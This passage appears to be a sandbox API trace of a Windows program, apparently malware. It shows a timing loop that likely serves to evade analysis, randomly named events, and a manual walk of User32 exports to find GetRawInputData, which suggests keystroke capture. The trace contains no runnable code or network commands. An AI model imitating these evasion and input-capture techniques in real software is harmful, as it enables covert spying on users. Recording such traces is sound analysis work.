cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0070.338] GetProcessHeap () returned 0x960000 [0070.338] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x8, Size=0x80) returned 0x97e630 [0070.427] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xb8 [0070.427] GetProcessHeap () returned 0x960000 [0070.427] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x38) returned 0x972de8 [0070.462] GetProcessHeap () returned 0x960000 [0070.462] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x14) returned 0x972e28 [0070.462] GetProcessHeap () returned 0x960000 [0070.462] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x28) returned 0x97d1a0 [0070.462] GetProcessHeap () returned 0x960000 [0070.462] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x8, Size=0x50) returned 0x97e6b8 [0070.462] GetProcessHeap () returned 0x960000 [0070.462] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x8, Size=0xa0) returned 0x97e710 [0070.462] CoInitialize (pvReserved=0x0) returned 0x0 [0070.474] CoCreateInstance (in: rclsid=0x4135d0*(Data1=0x62be5d10, Data2=0x60eb, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x416314*(Data1=0x29840822, Data2=0x5b84, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppv=0x31f9f8 | out: ppv=0x31f9f8*=0x67f608) returned 0x0 [0070.951] SystemDeviceEnum:ICreateDevEnum:CreateClassEnumerator (in: This=0x67f608, clsidDeviceClass=0x4135c0*(Data1=0x860bb310, Data2=0x5d01, Data3=0x11d0, Data4=([0]=0xbd, [1]=0x3b, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0xce, [7]=0x86)), ppenumMoniker=0x31f9fc, dwFlags=0x0 | out: ppenumMoniker=0x31f9fc*=0x0) returned 0x1 [0072.438] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0072.438] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x130000 [0072.439] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x140000 [0072.439] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0072.439] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0072.439] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0072.439] GetProcessHeap () returned 0x960000 [0072.439] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x19) returned 0x986a08 [0072.439] GetProcessHeap () returned 0x960000 [0072.439] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x19) returned 0x994008 [0072.439] GetProcessHeap () returned 0x960000 [0072.439] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x19) returned 0x994238 [0072.440] GetProcessHeap () returned 0x960000 [0072.440] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x19) returned 0x994210 [0072.440] GetProcessHeap () returned 0x960000 [0072.440] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x19) returned 0x9941e8 [0072.440] GetProcessHeap () returned 0x960000 [0072.440] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x19) returned 0x9941c0 [0072.440] Sleep (dwMilliseconds=0x1) [0072.444] GetTickCount () returned 0x114a3af [0072.444] Sleep (dwMilliseconds=0x1) [0072.460] GetTickCount () returned 0x114a3bf [0072.460] Sleep (dwMilliseconds=0x1) [0072.475] GetTickCount () returned 0x114a3ce [0072.475] Sleep (dwMilliseconds=0x1) [0072.491] GetTickCount () returned 0x114a3de [0072.491] Sleep (dwMilliseconds=0x1) [0072.507] GetTickCount () returned 0x114a3ee [0072.507] Sleep (dwMilliseconds=0x1) [0072.522] GetTickCount () returned 0x114a3fd [0072.522] Sleep (dwMilliseconds=0x1) [0072.538] GetTickCount () returned 0x114a40d [0072.538] Sleep (dwMilliseconds=0x1) [0072.553] GetTickCount () returned 0x114a41c [0072.553] Sleep (dwMilliseconds=0x1) [0072.569] GetTickCount () returned 0x114a42c [0072.569] Sleep (dwMilliseconds=0x1) [0072.584] GetTickCount () returned 0x114a43c [0072.584] Sleep (dwMilliseconds=0x1) [0072.600] GetTickCount () returned 0x114a44b [0072.600] Sleep (dwMilliseconds=0x1) [0072.616] GetTickCount () returned 0x114a45b [0072.616] Sleep (dwMilliseconds=0x1) [0072.632] GetTickCount () returned 0x114a46a [0072.632] Sleep (dwMilliseconds=0x1) [0072.647] GetTickCount () returned 0x114a47a [0072.647] Sleep (dwMilliseconds=0x1) [0072.663] GetTickCount () returned 0x114a48a [0072.663] Sleep (dwMilliseconds=0x1) [0072.679] GetTickCount () returned 0x114a499 [0072.679] Sleep (dwMilliseconds=0x1) [0072.694] GetTickCount () returned 0x114a4a9 [0072.694] Sleep (dwMilliseconds=0x1) [0072.709] GetTickCount () returned 0x114a4b8 [0072.709] Sleep (dwMilliseconds=0x1) [0072.743] GetTickCount () returned 0x114a4d8 [0072.743] Sleep (dwMilliseconds=0x1) [0072.756] GetTickCount () returned 0x114a4e7 [0072.756] Sleep (dwMilliseconds=0x1) [0072.772] GetTickCount () returned 0x114a4f7 [0072.772] Sleep (dwMilliseconds=0x1) [0072.788] GetTickCount () returned 0x114a506 [0072.788] Sleep (dwMilliseconds=0x1) [0072.803] GetTickCount () returned 0x114a516 [0072.803] Sleep (dwMilliseconds=0x1) [0072.818] GetTickCount () returned 0x114a526 [0072.818] Sleep (dwMilliseconds=0x1) [0072.834] GetTickCount () returned 0x114a535 [0072.834] Sleep (dwMilliseconds=0x1) [0072.849] GetTickCount () returned 0x114a545 [0072.850] Sleep (dwMilliseconds=0x1) [0072.865] GetTickCount () returned 0x114a554 [0072.865] Sleep (dwMilliseconds=0x1) [0072.881] GetTickCount () returned 0x114a564 [0072.881] Sleep (dwMilliseconds=0x1) [0072.897] GetTickCount () returned 0x114a574 [0072.897] Sleep (dwMilliseconds=0x1) [0072.912] GetTickCount () returned 0x114a583 [0072.912] Sleep (dwMilliseconds=0x1) [0072.928] GetTickCount () returned 0x114a593 [0072.928] Sleep (dwMilliseconds=0x1) [0072.944] GetTickCount () returned 0x114a5a2 [0072.944] Sleep (dwMilliseconds=0x1) [0072.959] GetTickCount () returned 0x114a5b2 [0072.959] Sleep (dwMilliseconds=0x1) [0072.974] GetTickCount () returned 0x114a5c2 [0072.974] Sleep (dwMilliseconds=0x1) [0072.990] GetTickCount () returned 0x114a5d1 [0072.990] Sleep (dwMilliseconds=0x1) [0073.006] GetTickCount () returned 0x114a5e1 [0073.006] Sleep (dwMilliseconds=0x1) [0073.021] GetTickCount () returned 0x114a5f0 [0073.021] Sleep (dwMilliseconds=0x1) [0073.037] GetTickCount () returned 0x114a600 [0073.037] Sleep (dwMilliseconds=0x1) [0073.053] GetTickCount () returned 0x114a610 [0073.053] Sleep (dwMilliseconds=0x1) [0073.068] GetTickCount () returned 0x114a61f [0073.068] Sleep (dwMilliseconds=0x1) [0073.083] GetTickCount () returned 0x114a62f [0073.083] Sleep (dwMilliseconds=0x1) [0073.099] GetTickCount () returned 0x114a63e [0073.099] Sleep (dwMilliseconds=0x1) [0073.115] GetTickCount () returned 0x114a64e [0073.115] Sleep (dwMilliseconds=0x1) [0073.132] GetTickCount () returned 0x114a65e [0073.132] Sleep (dwMilliseconds=0x1) [0073.146] GetTickCount () returned 0x114a66d [0073.146] Sleep (dwMilliseconds=0x1) [0073.162] GetTickCount () returned 0x114a67d [0073.162] Sleep (dwMilliseconds=0x1) [0073.177] GetTickCount () returned 0x114a68c [0073.177] Sleep (dwMilliseconds=0x1) [0073.193] GetTickCount () returned 0x114a69c [0073.193] Sleep (dwMilliseconds=0x1) [0073.236] GetTickCount () returned 0x114a6bb [0073.236] Sleep (dwMilliseconds=0x1) [0073.240] GetTickCount () returned 0x114a6cb [0073.240] Sleep (dwMilliseconds=0x1) [0073.255] GetTickCount () returned 0x114a6da [0073.255] Sleep (dwMilliseconds=0x1) [0073.271] GetTickCount () returned 0x114a6ea [0073.271] Sleep (dwMilliseconds=0x1) [0073.286] GetTickCount () returned 0x114a6fa [0073.286] Sleep (dwMilliseconds=0x1) [0073.302] GetTickCount () returned 0x114a709 [0073.302] Sleep (dwMilliseconds=0x1) [0073.318] GetTickCount () returned 0x114a719 [0073.318] Sleep (dwMilliseconds=0x1) [0073.334] GetTickCount () returned 0x114a728 [0073.334] Sleep (dwMilliseconds=0x1) [0073.349] GetTickCount () returned 0x114a738 [0073.349] Sleep (dwMilliseconds=0x1) [0073.364] GetTickCount () returned 0x114a748 [0073.364] Sleep (dwMilliseconds=0x1) [0073.380] GetTickCount () returned 0x114a757 [0073.380] Sleep (dwMilliseconds=0x1) [0073.396] GetTickCount () returned 0x114a767 [0073.396] lstrlenA (lpString="hiQoGKXKuG") returned 10 [0073.396] lstrlenA (lpString="hiQoGKXKuG") returned 10 [0073.396] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.396] lstrcpyA (in: lpString1=0x1c0000, lpString2="hiQoGKXKuG" | out: lpString1="hiQoGKXKuG") returned="hiQoGKXKuG" [0073.396] VirtualFree (lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.397] lstrlenA (lpString="hiQoGKXKuG") returned 10 [0073.397] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0073.397] lstrcatA (in: lpString1="", lpString2="hiQoGKXKuG" | out: lpString1="hiQoGKXKuG") returned="hiQoGKXKuG" [0073.397] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="hiQoGKXKuG") returned 0x144 [0073.397] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.397] lstrlenA (lpString="Dmkgg0loIe") returned 10 [0073.397] lstrlenA (lpString="Dmkgg0loIe") returned 10 [0073.397] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.397] lstrcpyA (in: lpString1=0x1c0000, lpString2="Dmkgg0loIe" | out: lpString1="Dmkgg0loIe") returned="Dmkgg0loIe" [0073.397] VirtualFree (lpAddress=0x130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.398] lstrlenA (lpString="Dmkgg0loIe") returned 10 [0073.398] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x130000 [0073.398] lstrcatA (in: lpString1="", lpString2="Dmkgg0loIe" | out: lpString1="Dmkgg0loIe") returned="Dmkgg0loIe" [0073.398] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="Dmkgg0loIe") returned 0x148 [0073.398] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.398] lstrlenA (lpString="hq48x0w4KE") returned 10 [0073.398] lstrlenA (lpString="hq48x0w4KE") returned 10 [0073.398] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.398] lstrcpyA (in: lpString1=0x1c0000, lpString2="hq48x0w4KE" | out: lpString1="hq48x0w4KE") returned="hq48x0w4KE" [0073.398] VirtualFree (lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.399] lstrlenA (lpString="hq48x0w4KE") returned 10 [0073.399] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x140000 [0073.399] lstrcatA (in: lpString1="", lpString2="hq48x0w4KE" | out: lpString1="hq48x0w4KE") returned="hq48x0w4KE" [0073.399] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="hq48x0w4KE") returned 0x188 [0073.399] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.399] lstrlenA (lpString="DuO0NgAqMo") returned 10 [0073.399] lstrlenA (lpString="DuO0NgAqMo") returned 10 [0073.399] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.399] lstrcpyA (in: lpString1=0x1c0000, lpString2="DuO0NgAqMo" | out: lpString1="DuO0NgAqMo") returned="DuO0NgAqMo" [0073.399] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.400] lstrlenA (lpString="DuO0NgAqMo") returned 10 [0073.400] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0073.400] lstrcatA (in: lpString1="", lpString2="DuO0NgAqMo" | out: lpString1="DuO0NgAqMo") returned="DuO0NgAqMo" [0073.400] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="DuO0NgAqMo") returned 0x18c [0073.400] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.400] lstrlenA (lpString="jgisVMOK9K") returned 10 [0073.400] lstrlenA (lpString="jgisVMOK9K") returned 10 [0073.400] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.400] lstrcpyA (in: lpString1=0x1c0000, lpString2="jgisVMOK9K" | out: lpString1="jgisVMOK9K") returned="jgisVMOK9K" [0073.400] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.401] lstrlenA (lpString="jgisVMOK9K") returned 10 [0073.401] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0073.401] lstrcatA (in: lpString1="", lpString2="jgisVMOK9K" | out: lpString1="jgisVMOK9K") returned="jgisVMOK9K" [0073.401] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="jgisVMOK9K") returned 0x190 [0073.401] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.401] lstrlenA (lpString="Us2q5EEaTu") returned 10 [0073.401] lstrlenA (lpString="Us2q5EEaTu") returned 10 [0073.401] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0073.401] lstrcpyA (in: lpString1=0x1c0000, lpString2="Us2q5EEaTu" | out: lpString1="Us2q5EEaTu") returned="Us2q5EEaTu" [0073.401] VirtualFree (lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.401] lstrlenA (lpString="Us2q5EEaTu") returned 10 [0073.402] VirtualAlloc (lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0073.402] lstrcatA (in: lpString1="", lpString2="Us2q5EEaTu" | out: lpString1="Us2q5EEaTu") returned="Us2q5EEaTu" [0073.402] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="Us2q5EEaTu") returned 0x194 [0073.402] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.429] GetProcessHeap () returned 0x960000 [0073.429] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x54) returned 0x996b10 [0073.454] GetProcessHeap () returned 0x960000 [0073.454] RtlAllocateHeap (HeapHandle=0x960000, Flags=0x0, Size=0x7c) returned 0x999d98 [0073.454] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x198 [0073.454] LoadLibraryW (lpLibFileName="User32.dll") returned 0x77130000 [0073.475] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AdjustWindowRect", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AlignRects", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="GetRawInputData") returned -1 [0073.475] lstrcmpA (lpString1="AnimateWindow", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="AnyPopup", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="AppendMenuA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="AppendMenuW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="AttachThreadInput", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BeginPaint", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BlockInput", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BringWindowToTop", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="BuildReasonArray", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CalcMenuBar", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CalculatePopupWindowPosition", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CallMsgFilter", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CallMsgFilterA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CallMsgFilterW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CallNextHookEx", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CallWindowProcA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CallWindowProcW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CancelShutdown", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CascadeChildWindows", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="CascadeWindows", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeClipboardChain", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeDisplaySettingsW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeMenuA", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeMenuW", lpString2="GetRawInputData") returned -1 [0073.476] lstrcmpA (lpString1="ChangeWindowMessageFilter", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="ChangeWindowMessageFilterEx", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharLowerA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharLowerBuffA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharLowerBuffW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharLowerW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharNextA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharNextExA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharNextW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharPrevA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharPrevExA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharPrevW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharToOemA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharToOemBuffA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharToOemBuffW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharToOemW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharUpperA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharUpperBuffA", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharUpperBuffW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CharUpperW", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CheckDesktopByThreadId", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CheckDlgButton", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CheckMenuItem", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CheckMenuRadioItem", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CheckRadioButton", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CheckWindowThreadDesktop", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="ChildWindowFromPoint", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="ChildWindowFromPointEx", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CliImmSetHotKey", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="ClientThreadSetup", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="ClientToScreen", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="ClipCursor", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CloseClipboard", lpString2="GetRawInputData") returned -1 [0073.477] lstrcmpA (lpString1="CloseDesktop", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CloseGestureInfoHandle", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CloseTouchInputHandle", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CloseWindow", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CloseWindowStation", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="ConsoleControl", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="ControlMagnification", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CopyAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CopyAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CopyIcon", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CopyImage", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CopyRect", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CountClipboardFormats", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateAcceleratorTableA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateAcceleratorTableW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateCaret", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateCursor", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDesktopA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDesktopExA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDesktopExW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDesktopW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDialogIndirectParamA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDialogIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDialogIndirectParamW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDialogParamA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateDialogParamW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateIcon", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateIconFromResource", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateIconFromResourceEx", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateIconIndirect", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateMDIWindowA", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateMDIWindowW", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0073.478] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0073.479] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0073.480] lstrcmpA (lpString1="DdeReconnect", 